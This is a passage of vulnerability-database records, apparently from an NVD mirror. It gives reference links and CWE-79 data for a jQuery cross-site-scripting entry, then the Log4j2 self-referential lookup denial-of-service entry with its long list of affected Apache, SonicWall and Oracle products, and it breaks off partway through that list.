"Mitigation", "Vendor Advisory", ], url: "https://jquery.com/upgrade-guide/3.5/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r0483ba0072783c2e1bfea613984bfb3c86e73ba8879d780dc1cc7d36%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r49ce4243b4738dd763caeb27fa8ad6afb426ae3e8c011ff00b8b1f48%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r54565a8f025c7c4f305355fdfd75b68eca442eebdb5f31c2e7d977ae%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r564585d97bc069137e64f521e68ba490c7c9c5b342df5d73c49a0760%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r706cfbc098420f7113968cc377247ec3d1439bce42e679c11c609e2d%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/r8f70b0f65d6bedf316ecd899371fd89e65333bc988f6326d2956735c%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rbb448222ba62c430e21e13f940be4cb5cfc373cd3bce56b48c0ffa67%40%3Cdev.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rdf44341677cf7eec7e9aa96dcf3f37ed709544863d619cca8c36f133%40%3Ccommits.airflow.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/re4ae96fa5c1a2fe71ccbb7b7ac1538bd0cb677be270a2bf6e2f8d108%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/rede9cfaa756e050a3d83045008f84a62802fc68c17f2b4eabeaae5e4%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.apache.org/thread.html/ree3bd8ddb23df5fa4e372d11c226830ea3650056b1059f3965b3fce2%40%3Cissues.flink.apache.org%3E", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Mailing List", "Third Party Advisory", ], url: "https://lists.debian.org/debian-lts-announce/2021/03/msg00033.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.debian.org/debian-lts-announce/2023/08/msg00040.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AVKYXLWCLZBV2N7M46KYK4LVA5OXWPBY/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QPN2L2XVQGUA2V5HNQJWHK3APSK3VN7K/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SAPQVX3XDNPGFT26QAQ6AJIXZZBZ4CD4/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SFP4UK4EGP4AFH2MWYJ5A5Z4I7XVFQ6B/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VOE7P7APPRQKD4FGNHBKJPDY6FFCOH3W/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.gentoo.org/glsa/202007-03", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://security.netapp.com/advisory/ntap-20200511-0006/", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.debian.org/security/2020/dsa-4693", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.drupal.org/sa-core-2020-002", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com//security-alerts/cpujul2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuApr2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujan2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpujul2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", url: "https://www.oracle.com/security-alerts/cpujul2022.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2020.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://www.oracle.com/security-alerts/cpuoct2021.html", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-10", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2020-11", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2021-02", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Third Party Advisory", ], url: "https://www.tenable.com/security/tns-2021-10", }, ], sourceIdentifier: "security-advisories@github.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-79", }, ], source: "security-advisories@github.com", type: "Secondary", }, { description: [ { lang: "en", value: "CWE-79", }, ], source: "nvd@nist.gov", type: "Primary", }, ], }
Vulnerability from fkie_nvd
Published
2021-12-18 12:15
Modified
2024-11-21 06:31
Severity ?
Summary
Apache Log4j2 versions 2.0-alpha1 through 2.16.0 (excluding 2.12.3 and 2.3.1) did not protect from uncontrolled recursion from self-referential lookups. This allows an attacker with control over Thread Context Map data to cause a denial of service when a crafted string is interpreted. This issue was fixed in Log4j 2.17.0, 2.12.3, and 2.3.1.
References
Impacted products
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "42BCB94E-86D2-4B98-B9E6-5789F2272692", versionEndExcluding: "2.3.1", versionStartIncluding: "2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "19DA22A8-0B29-4181-B44E-57D28D9DB331", versionEndExcluding: "2.12.3", versionStartIncluding: "2.4", vulnerable: true, }, { criteria: "cpe:2.3:a:apache:log4j:*:*:*:*:*:*:*:*", matchCriteriaId: "61E2AC03-D49B-4A15-BDA4-61DAF142CEED", versionEndIncluding: "2.16.0", versionStartIncluding: "2.13.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:netapp:cloud_manager:-:*:*:*:*:*:*:*", matchCriteriaId: "197D0D80-6702-4B61-B681-AFDBA7D69067", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", matchCriteriaId: "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", vulnerable: true, }, { criteria: "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*", matchCriteriaId: "FA6FEEC2-9F11-4643-8827-749718254FED", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:sonicwall:email_security:*:*:*:*:*:*:*:*", matchCriteriaId: "421BCD43-8ECC-4B1E-9F3E-C20BB2BC672A", versionEndIncluding: "10.0.12", vulnerable: true, }, { criteria: "cpe:2.3:a:sonicwall:network_security_manager:*:*:*:*:on-premises:*:*:*", matchCriteriaId: "1EA49667-8F94-4091-B9A9-A94318D83C24", versionEndExcluding: "3.0", versionStartIncluding: "2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:sonicwall:network_security_manager:*:*:*:*:saas:*:*:*", matchCriteriaId: "7C1B257C-9442-4C73-91CB-67893A78F0DF", versionEndExcluding: "3.0", versionStartIncluding: "2.0", vulnerable: true, }, { criteria: "cpe:2.3:a:sonicwall:web_application_firewall:*:*:*:*:*:*:*:*", matchCriteriaId: "AD1E667A-9CAA-4382-957A-E4F1A4960E0C", versionEndExcluding: "3.1.0", versionStartIncluding: "3.0.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:sonicwall:6bk1602-0aa12-0tp0_firmware:*:*:*:*:*:*:*:*", matchCriteriaId: "B407FBDB-7900-4F69-B745-809277F26050", versionEndExcluding: "2.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:sonicwall:6bk1602-0aa12-0tp0:-:*:*:*:*:*:*:*", matchCriteriaId: "05AF56AD-FBAF-4AB8-B04D-1E28BF10B767", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:sonicwall:6bk1602-0aa22-0tp0_firmware:*:*:*:*:*:*:*:*", matchCriteriaId: "E3103225-6440-43F4-9493-131878735B2A", versionEndExcluding: "2.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:sonicwall:6bk1602-0aa22-0tp0:-:*:*:*:*:*:*:*", matchCriteriaId: "2B3A0115-86AB-4677-A026-D99B971D9EF5", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:sonicwall:6bk1602-0aa32-0tp0_firmware:*:*:*:*:*:*:*:*", matchCriteriaId: "914A44DE-C4AA-45A0-AC26-5FAAF576130E", versionEndExcluding: "2.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:sonicwall:6bk1602-0aa32-0tp0:-:*:*:*:*:*:*:*", matchCriteriaId: "9D1C62CF-414A-4670-9F19-C11A381DB830", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:sonicwall:6bk1602-0aa42-0tp0_firmware:*:*:*:*:*:*:*:*", matchCriteriaId: "75359CC5-58A7-4B5A-B9BF-BDE59552EF1C", versionEndExcluding: "2.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:sonicwall:6bk1602-0aa42-0tp0:-:*:*:*:*:*:*:*", matchCriteriaId: "706A3F00-8489-4735-B09B-34528F7C556A", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:o:sonicwall:6bk1602-0aa52-0tp0_firmware:*:*:*:*:*:*:*:*", matchCriteriaId: "C23D02B7-C9A7-4ED9-AE71-765F01ACA55C", versionEndExcluding: "2.7.0", vulnerable: true, }, ], negate: false, operator: "OR", }, { cpeMatch: [ { criteria: "cpe:2.3:h:sonicwall:6bk1602-0aa52-0tp0:-:*:*:*:*:*:*:*", matchCriteriaId: "E9DCB171-E4C8-4472-8023-20992ABB9348", vulnerable: false, }, ], negate: false, operator: "OR", }, ], operator: "AND", }, { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:oracle:agile_engineering_data_management:6.2.1.0:*:*:*:*:*:*:*", matchCriteriaId: "80C9DBB8-3D50-4D5D-859A-B022EB7C2E64", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_plm:9.3.6:*:*:*:*:*:*:*", matchCriteriaId: "C650FEDB-E903-4C2D-AD40-282AB5F2E3C2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:agile_plm_mcad_connector:3.6:*:*:*:*:*:*:*", matchCriteriaId: "B0C0714E-4255-4095-B26C-70EB193B8F98", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:autovue_for_agile_product_lifecycle_management:21.0.2:*:*:*:*:*:*:*", matchCriteriaId: "97994257-C9A4-4491-B362-E8B25B7187AB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_deposits_and_lines_of_credit_servicing:2.12.0:*:*:*:*:*:*:*", matchCriteriaId: "1F834ACC-D65B-4CA3-91F1-415CBC6077E2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_default_management:2.7.1:*:*:*:*:*:*:*", matchCriteriaId: "473749BD-267E-480F-8E7F-C762702DB66E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_enterprise_default_management:2.12.0:*:*:*:*:*:*:*", matchCriteriaId: "320D36DA-D99F-4149-B582-3F4AB2F41A1B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_loans_servicing:2.12.0:*:*:*:*:*:*:*", matchCriteriaId: "5E502A46-BAF4-4558-BC8F-9F014A2FB26A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_party_management:2.7.0:*:*:*:*:*:*:*", matchCriteriaId: "C542DC5E-6657-4178-9C69-46FD3C187D56", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_payments:14.5:*:*:*:*:*:*:*", matchCriteriaId: "633E5B20-A7A7-4346-A71D-58121B006D00", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", matchCriteriaId: "132CE62A-FBFC-4001-81EC-35D81F73AF48", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.7.1:*:*:*:*:*:*:*", matchCriteriaId: "645AA3D1-C8B5-4CD2-8ACE-31541FA267F0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_platform:2.12.0:*:*:*:*:*:*:*", matchCriteriaId: "BDC6D658-09EA-4C41-869F-1C2EA163F751", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_trade_finance:14.5:*:*:*:*:*:*:*", matchCriteriaId: "64750C01-21AC-4947-B674-6690EAAAC5DB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:banking_treasury_management:14.5:*:*:*:*:*:*:*", matchCriteriaId: "3C3D0063-9458-4018-9B92-79A219716C10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:*", matchCriteriaId: "D40AD626-B23A-44A3-A6C0-1FFB4D647AE4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_asap:7.3:*:*:*:*:*:*:*", matchCriteriaId: "3141B86F-838D-491A-A8ED-3B7C54EA89C1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.4:*:*:*:*:*:*:*", matchCriteriaId: "B465F237-0271-4389-8035-89C07A52350D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_billing_and_revenue_management:12.0.0.5:*:*:*:*:*:*:*", matchCriteriaId: "123CB9B5-C800-47FD-BD0C-BE44198E97E2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_console:1.9.0:*:*:*:*:*:*:*", matchCriteriaId: "DAAB7154-4DE8-4806-86D0-C1D33B84417B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_network_function_cloud_native_environment:1.10.0:*:*:*:*:*:*:*", matchCriteriaId: "C2A5B24D-BDF2-423C-98EA-A40778C01A05", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_network_repository_function:1.15.0:*:*:*:*:*:*:*", matchCriteriaId: "6F60E32F-0CA0-4C2D-9848-CB92765A9ACB", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_network_repository_function:1.15.1:*:*:*:*:*:*:*", matchCriteriaId: "DF616620-88CE-4A77-B904-C1728A2E6F9B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_network_slice_selection_function:1.8.0:*:*:*:*:*:*:*", matchCriteriaId: "3AA09838-BF13-46AC-BB97-A69F48B73A8A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_policy:1.15.0:*:*:*:*:*:*:*", matchCriteriaId: "B4367D9B-BF81-47AD-A840-AC46317C774D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_security_edge_protection_proxy:1.7.0:*:*:*:*:*:*:*", matchCriteriaId: "BD4349FE-EEF8-489A-8ABF-5FCD55EC6DE0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_service_communication_proxy:1.15.0:*:*:*:*:*:*:*", matchCriteriaId: "175B97A7-0B00-4378-AD9F-C01B6D9FD570", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_cloud_native_core_unified_data_repository:1.15.0:*:*:*:*:*:*:*", matchCriteriaId: "C6EAA723-2A23-4151-930B-86ACF9CC1C0C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_convergence:3.0.2.2.0:*:*:*:*:*:*:*", matchCriteriaId: "7DF939F5-C0E1-40A4-95A2-0CE7A03AB4EE", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_convergence:3.0.3.0:*:*:*:*:*:*:*", matchCriteriaId: "EEC452FA-D1D5-4175-9371-F6055818192E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_convergent_charging_controller:*:*:*:*:*:*:*:*", matchCriteriaId: "0172500D-DE51-44E0-91E8-C8F36617C1F8", versionEndIncluding: "12.0.4.0.0", versionStartIncluding: "12.0.1.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_convergent_charging_controller:6.0.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "E99E7D49-AE53-4D16-AB24-EBEAAD084289", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_diameter_signaling_router:*:*:*:*:*:*:*:*", matchCriteriaId: "F9550113-7423-48D8-A1C7-95D6AEE9B33C", versionEndIncluding: "8.5.1.0", versionStartIncluding: "8.3.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_element_management_system:46.6:*:*:*:*:*:*:*", matchCriteriaId: "7FDD479D-9070-42E2-A8B1-9497BC4C0CF4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_eagle_ftp_table_base_retrieval:4.5:*:*:*:*:*:*:*", matchCriteriaId: "C68536CA-C7E2-4228-A6B8-F0DB6A9D29EC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_element_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "02712DD6-D944-4452-8015-000B9851D257", versionEndExcluding: "9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_evolved_communications_application_server:7.1:*:*:*:*:*:*:*", matchCriteriaId: "987811D5-DA5E-493D-8709-F9231A84E5F9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.3:*:*:*:*:*:*:*", matchCriteriaId: "46E23F2E-6733-45AF-9BD9-1A600BD278C8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.4:*:*:*:*:*:*:*", matchCriteriaId: "E812639B-EE28-4C68-9F6F-70C8BF981C86", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_ip_service_activator:7.4.0:*:*:*:*:*:*:*", matchCriteriaId: "DE7A60DB-A287-4E61-8131-B6314007191B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_messaging_server:8.1:*:*:*:*:*:*:*", matchCriteriaId: "E1214FDF-357A-4BB9-BADE-50FB2BD16D10", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_charging_and_control:*:*:*:*:*:*:*:*", matchCriteriaId: "26940103-F37C-4FBD-BDFD-528A497209D6", versionEndIncluding: "12.0.4.0.0", versionStartIncluding: "12.0.1.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_charging_and_control:6.0.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "EB9047B1-DA8C-4BFD-BE41-728BD7ECF3E6", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_network_integrity:7.3.6:*:*:*:*:*:*:*", matchCriteriaId: "B21E6EEF-2AB7-4E96-B092-1F49D11B4175", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_performance_intelligence_center:10.4.0.3:*:*:*:*:*:*:*", matchCriteriaId: "00E9A2B1-7562-4E6B-AE25-1B647F24EFDF", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.4:*:*:*:*:*:*:*", matchCriteriaId: "D6BDB265-293F-4F27-8CE0-576DF3ECD3BC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_pricing_design_center:12.0.0.5:*:*:*:*:*:*:*", matchCriteriaId: "53600579-4542-4D80-A93C-3E45938C749D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_service_broker:6.2:*:*:*:*:*:*:*", matchCriteriaId: "E6235EAE-47DD-4292-9941-6FF8D0A83843", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:*", matchCriteriaId: "062E4E7C-55BB-46F3-8B61-5A663B565891", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_report_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "274BCA96-2E6A-4B77-B69E-E2093A668D28", versionEndExcluding: "9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_session_route_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "8D4B738B-08CF-44F6-A939-39F5BEAF03B2", versionEndExcluding: "9.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.3.5:*:*:*:*:*:*:*", matchCriteriaId: "17A91FD9-9F77-42D3-A4D9-48BC7568ADE1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.1:*:*:*:*:*:*:*", matchCriteriaId: "A7637F8B-15F1-42E2-BE18-E1FF7C66587D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_unified_inventory_management:7.4.2:*:*:*:*:*:*:*", matchCriteriaId: "E43D793A-7756-4D58-A8ED-72DC4EC9CEA7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_user_data_repository:12.4:*:*:*:*:*:*:*", matchCriteriaId: "0FAF2403-99A1-4DBC-BAC4-35D883D8E5D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "A4AA6214-A85D-4BF4-ABBF-0E4F8B7DA817", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:communications_webrtc_session_controller:7.2.1:*:*:*:*:*:*:*", matchCriteriaId: "1F05AF4B-A747-4314-95AE-F8495479AB3E", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:data_integrator:12.2.1.3.0:*:*:*:*:*:*:*", matchCriteriaId: "9901F6BA-78D5-45B8-9409-07FF1C6DDD38", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:data_integrator:12.2.1.4.0:*:*:*:*:*:*:*", matchCriteriaId: "9FADE563-5AAA-42FF-B43F-35B20A2386C9", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:e-business_suite:12.2:*:*:*:*:*:*:*", matchCriteriaId: "4B3C968F-4038-4A8D-A345-8CD3F73A653B", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "D26F3E23-F1A9-45E7-9E5F-0C0A24EE3783", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_base_platform:13.5.0.0:*:*:*:*:*:*:*", matchCriteriaId: "6E8758C8-87D3-450A-878B-86CE8C9FC140", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.4.1.1:*:*:*:*:*:*:*", matchCriteriaId: "615C7D0D-A9D5-43BA-AF61-373EC1095354", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_for_peoplesoft:13.5.1.1:*:*:*:*:*:*:*", matchCriteriaId: "6F772DC1-F93E-43A4-81DA-A2A1E204C5D5", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.4.0.0:*:*:*:*:*:*:*", matchCriteriaId: "B095CC03-7077-4A58-AB25-CC5380CDCE5A", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:*:*:*:*:*:*:*:*", matchCriteriaId: "7EA4D3C5-6A7C-4421-88EF-445A96DBCE0C", versionEndIncluding: "8.1.1", versionStartIncluding: "8.0.7", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_model_management_and_governance:8.0.8.0.0:*:*:*:*:*:*:*", matchCriteriaId: "F033C6C8-61D9-41ED-94E6-63BE7BA22EFC", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_model_management_and_governance:8.1.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "4B829B72-7DE0-415F-A1AF-51637F134B76", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:financial_services_model_management_and_governance:8.1.1.0.0:*:*:*:*:*:*:*", matchCriteriaId: "FF8DC5FD-09DE-446F-879B-DB86C0CC95B4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_universal_banking:*:*:*:*:*:*:*:*", matchCriteriaId: "B0148D20-089E-4C19-8CA3-07598D8AFBF1", versionEndIncluding: "12.4", versionStartIncluding: "12.1.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_universal_banking:*:*:*:*:*:*:*:*", matchCriteriaId: "54BE0CCE-8216-4CCF-96E1-38EF76124368", versionEndIncluding: "14.3.0", versionStartIncluding: "14.0.0", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_universal_banking:11.83.3:*:*:*:*:*:*:*", matchCriteriaId: "0017AE8C-DBCA-46B4-A036-DF0E289199D4", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:flexcube_universal_banking:14.5:*:*:*:*:*:*:*", matchCriteriaId: "609645BF-B34F-40AC-B9C9-C3FB870F4ED2", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_empirica_signal:9.1.0.6:*:*:*:*:*:*:*", matchCriteriaId: "67013CB6-5FA6-438B-A131-5AEDEBC66723", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_empirica_signal:9.2.0.0:*:*:*:*:*:*:*", matchCriteriaId: "8FC5F6E6-3515-439B-9665-3B6151CEF577", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_inform:6.2.1.1:*:*:*:*:*:*:*", matchCriteriaId: "4CB4F0E6-3B36-4736-B2F2-CB2A16309F8D", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_inform:6.3.2.1:*:*:*:*:*:*:*", matchCriteriaId: "0E72CF27-6E5F-404E-B5DF-B470C99AF5E8", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_inform:7.0.0.0:*:*:*:*:*:*:*", matchCriteriaId: "51BCEC65-25B7-480C-860C-9D97F78CCE3F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:health_sciences_information_manager:*:*:*:*:*:*:*:*", matchCriteriaId: "16AEA21E-0B11-44A5-8BFB-550521D8E0D5", versionEndIncluding: "3.0.4", versionStartIncluding: "3.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_data_repository:8.1.1:*:*:*:*:*:*:*", matchCriteriaId: "BA92E70A-2249-4144-B0B8-35501159ADB3", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_foundation:*:*:*:*:*:*:*:*", matchCriteriaId: "9F69F8F6-BA2D-4DC6-BAB2-B9155F8B45CD", versionEndIncluding: "7.3.0.4", versionStartIncluding: "7.3.0.1", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_master_person_index:5.0.1:*:*:*:*:*:*:*", matchCriteriaId: "10774601-93C3-4938-A3E7-3C3D97A6F73C", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:4.1.0:*:*:*:*:*:*:*", matchCriteriaId: "523391D8-CB84-4EBD-B337-6A99F52E537F", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:healthcare_translational_research:4.1.1:*:*:*:*:*:*:*", matchCriteriaId: "B0A3C700-710A-4A0A-A2D4-ABB7AAC9B128", vulnerable: true, }, { criteria: "cpe:2.3:a:oracle:hospitality_suite8:8.13.0:*:*:*:*:*:*:*", matchCriteriaId: "D4833DCA-FC54-4F89-B2DF-8E39C9C49DF6", vulnerable: true, }, { criteria: 